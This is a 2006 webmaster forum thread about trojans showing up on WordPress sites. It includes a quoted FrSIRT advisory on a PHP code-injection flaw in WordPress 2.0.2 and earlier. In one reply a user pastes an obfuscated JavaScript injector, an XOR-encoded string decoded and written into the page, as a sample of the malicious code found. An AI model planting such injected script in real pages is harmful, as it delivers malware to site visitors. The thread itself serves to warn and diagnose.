WORDPRESS - trojan-virus

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • SmokeyTheBear
    ►SouthOfHeaven
    • Jun 2004
    • 28609

    #1

    WORDPRESS - trojan-virus

    I have had alot of people contacting me recently about trojans and virii on their sites that show up mysteriously on all their pages..

    The comman factor seems to be wordpress. I am not a wordpress user so i dont know whats up , but if you are running wordpress i suggest doing an update regardless and if you are having problems contact your host to have your server cleaned up..

    p.s. just cause you got rid of it once doesnt mean its gone. Its likely hiding in the shadows waiting to reinstall itself..

    p.s.s. i recently invented a very usefull tool for checking sites ..
    http://tools.webspacemania.com/proxy/
    What this is is a "double anonymous" browser that will surf to any domain using a random proxy that then forwards the html to my server through the proxy then redisplay's the results to you. ( its also usefull to determine if your having network troubles connecting to a site ).

    Keep in mind it going through several proxies so it takes a bit of time , and sometime the proxies are dead so it will fail. Also keep in mind the images are redisplayed inlin in your browser , so while the page contents are completely anonymous , any images will be redisplayed inline through your browser so if you want to be ULTRA anonymous , turn off images in your browser first.

    The script will disable any javascript on the target page so you dont have to worry about trojans and such when checking a site..

    When you testa site the proxy port and county of the proxy will be displayed in the upper left hand corner of any page you check
    hatisblack at yahoo.com
  • 2HousePlague
    CURATOR
    • Jul 2004
    • 14572

    #2
    Thanks!






    2hp
    tada!

    Comment

    • SmokeyTheBear
      ►SouthOfHeaven
      • Jun 2004
      • 28609

      #3
      bump 4 wordpress peeps
      hatisblack at yahoo.com

      Comment

      • Scotty.T
        Confirmed User
        • Nov 2004
        • 1062

        #4
        Giving this a try but I can't read the results page properly. The proxy info box covers part of the message. I can only see the last 5 letters of a word 'ently'
        .

        Comment

        • baddog
          So Fucking Banned
          • Apr 2001
          • 107089

          #5
          What is this trojan doing that people noticed a problem?

          What version of WP was the common denominator?

          Comment

          • nancycash
            My Sig was too Big! :(
            • May 2006
            • 222

            #6
            thanks for useful link and info. esp. for link - now it's in my "favorites"
            NEW SOLO GIRL

            Comment

            • Violetta
              Affiliate
              • Jul 2004
              • 28735

              #7
              I had some trojans on my servers earlier today. Perhaps they came from a wordpress... Had to upgrade. Thanks for the info!
              M&A Queen

              Comment

              • Basic_man
                Programming King Pin
                • Oct 2003
                • 27360

                #8
                Thanks for the info, I'll take a closer look at this.
                UUGallery Builder - automated photo/video gallery plugin for Wordpress!
                Stop looking! Checkout Naked Hosting, online since 1999 !

                Comment

                • Rebecca Love
                  Skinemax BQueen
                  • Jul 2004
                  • 2145

                  #9
                  bump again for WP crew!


                  Kisses,
                  Rebecca Love
                  "Skinemax BQueen of Late-Nite"
                  www.RebeccaLove.com

                  Comment

                  • ladida
                    Confirmed User
                    • Nov 2005
                    • 2179

                    #10
                    Its a voulnerability in wordpress actually that among other things, allows people to install trojan on your system.
                    agentGFY *at* gmail.com

                    Comment

                    • fetishblog
                      Confirmed User
                      • Sep 2005
                      • 5995

                      #11
                      <script language="JavaScript">
                      e = '0x00' + '22';str1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA% C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA %C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8 C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE% 8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6 %CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%9 9%8C%C1%CA%D7%9F%BD%AE%AB";str=tmp='';for(i=0;i<st r1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
                      </script>
                      This is what the malicious code usually looks like that he is talking about.

                      Fling.com doesn't steal your traffic and sales unlike some other dating companies. I promote them, and so should you!

                      Comment

                      • OzMan
                        Confirmed User
                        • Sep 2003
                        • 9162

                        #12
                        hmm nothing on the WP site yet... any confirmation that it's actually a WP problem?

                        Comment

                        • OzMan
                          Confirmed User
                          • Sep 2003
                          • 9162

                          #13
                          apparently jerzeemedia is familiar with the problem and solution

                          http://www.gofuckyourself.com/showth...oto=nextnewest

                          Comment

                          • SmokeyTheBear
                            ►SouthOfHeaven
                            • Jun 2004
                            • 28609

                            #14
                            Originally posted by OzMan
                            hmm nothing on the WP site yet... any confirmation that it's actually a WP problem?
                            havent seen anything but been contacted by nearly a dozen [people this week , that was the only common thing so far ( there are other script being hit though , like trade scripts )
                            hatisblack at yahoo.com

                            Comment

                            • Corona
                              Confirmed User
                              • Feb 2002
                              • 2185

                              #15
                              It has to be more than just a wordpress problem.

                              I had something that looked like the example fetishblog posted and the only script used is phpadsnew.

                              Anyone know what it does?
                              I was looking for a job, and then I found a job
                              And heaven knows I'm miserable now

                              Comment

                              • baddog
                                So Fucking Banned
                                • Apr 2001
                                • 107089

                                #16
                                I will ask again . . . what version of Wordpress is this happening on?

                                Comment

                                • nico-t
                                  emperor of my world
                                  • Aug 2004
                                  • 29903

                                  #17
                                  yea we need more details

                                  Comment

                                  • JD
                                    Too lazy to set a custom title
                                    • Sep 2003
                                    • 22651

                                    #18
                                    Originally posted by baddog
                                    I will ask again . . . what version of Wordpress is this happening on?
                                    i'm wondering the same thing.

                                    Comment

                                    • dunefield
                                      www.barely18movies.com
                                      • Feb 2003
                                      • 10920

                                      #19
                                      bump....

                                      Comment

                                      • SmokeyTheBear
                                        ►SouthOfHeaven
                                        • Jun 2004
                                        • 28609

                                        #20
                                        someone mentioned it in another thread. im not familiar with the product because i dont use it .. ( im referring to the version number affected )
                                        hatisblack at yahoo.com

                                        Comment

                                        • baddog
                                          So Fucking Banned
                                          • Apr 2001
                                          • 107089

                                          #21
                                          Originally posted by SmokeyTheBear
                                          someone mentioned it in another thread. im not familiar with the product because i dont use it .. ( im referring to the version number affected )

                                          I would be inclined to think it was a common plugin they were using rather that WP itself.

                                          Comment

                                          • poondaddy
                                            Confirmed User
                                            • Feb 2006
                                            • 211

                                            #22
                                            There was a security update for Wordpress released a month or so ago, 2.02

                                            Comment

                                            • SmokeyTheBear
                                              ►SouthOfHeaven
                                              • Jun 2004
                                              • 28609

                                              #23
                                              http://www.gofuckyourself.com/showthread.php?t=613700
                                              hatisblack at yahoo.com

                                              Comment

                                              • JD
                                                Too lazy to set a custom title
                                                • Sep 2003
                                                • 22651

                                                #24
                                                just checked all of my wp blogs and nothing found. whew

                                                Comment

                                                • SmokeyTheBear
                                                  ►SouthOfHeaven
                                                  • Jun 2004
                                                  • 28609

                                                  #25
                                                  Advisory ID : FrSIRT/ADV-2006-1992
                                                  CVE ID : GENERIC-MAP-NOMATCH
                                                  Rated as : High Risk
                                                  Remotely Exploitable : Yes
                                                  Locally Exploitable : Yes
                                                  Release Date : 2006-05-26

                                                  Technical Description

                                                  A vulnerability has been identified in WordPress, which may be exploited by attackers to compromise a vulnerable web server. This flaw is due to input validation errors in the "wp-admin/profile.php" script that does not validate certain parameters before being written to PHP scripts in the "wp-content/cache/userlogins/" and "wp-content/cache/users/" directories, which could be exploited by malicious users to inject and execute arbitrary PHP code with the privileges of the web server.

                                                  Note : An input validation error in the "vars.php" script when handling the "PC_REMOTE_ADDR" HTTP header could be exploited by attackers to spoof their IP addresses.

                                                  Affected Products

                                                  WordPress version 2.0.2 and prior

                                                  Solution

                                                  The FrSIRT is not aware of any official supplied patch for this issue.
                                                  hatisblack at yahoo.com

                                                  Comment

                                                  • baddog
                                                    So Fucking Banned
                                                    • Apr 2001
                                                    • 107089

                                                    #26
                                                    okay, thanks

                                                    Comment

                                                    • AlienQ - BANNED FOR LIFE
                                                      best designer on GFY
                                                      • Mar 2003
                                                      • 30307

                                                      #27
                                                      I was a victim of this piece of this shit.

                                                      Comment

                                                      Working...